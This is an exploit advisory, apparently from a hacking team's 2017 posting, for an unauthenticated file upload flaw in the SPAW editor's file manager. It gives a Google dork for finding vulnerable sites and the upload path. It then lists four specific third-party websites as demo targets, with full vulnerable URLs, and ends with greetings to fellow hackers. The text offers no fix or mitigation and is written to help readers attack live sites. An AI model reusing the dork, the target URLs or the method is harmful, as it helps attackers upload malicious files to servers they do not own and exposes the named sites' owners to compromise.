*=============================================================| | Exploit Title: SPAW Manager File Upload Vulnerability | Exploit Author: Ashiyane Digital Security Team | vendor homepage : http://www.spawglass.com/ | Google Dork 1: inurl:/spaw2/dialogs/dialog.php | Tested on: Windows 10 ~~~> Mozilla Firefox | Date: 1 /21 / 2017 |===========| | Vulnerability Method :GET |===========| | Vulnerability description: | This page allows visitors to upload files to the server. | Various web applications allow users to upload files (such as images, html,..). |=============================================================| | Then Choose a Target and put this after Upload File : /spaw2/uploads/ |=========| |Demo : |http://www.nirafonds.com/spaw2/dialogs/dialog.php? |module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files | |http://www.wholehealthamerica.com/spaw2/dialogs/dialog.php?|module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files | |http://vprofite.com/include/spaw2/dialogs/dialog.php?|module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset&scid=cf73b58bb51c52235494da752d98cac9&type=files | |http://www.rcst.or.th/spaw2/dialogs/dialog.php?|module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset&scid=cf73b58bb51c52235494da752d98cac9&type=files *=============================================================| | Special Thanks To : Behrooz_Ice، Virangar ,H_SQLI.EMpiRe ، Ehsan Cod3r ، micle ، | Und3rgr0und ، Amir.ght ، xenotix، modiret، V For Vendetta ، Alireza ، | r4ouf ، Spoofer ،M.R.S.L.Y And All Of My Friends ، | The Last One : My Self, HackfanS *=============================================================|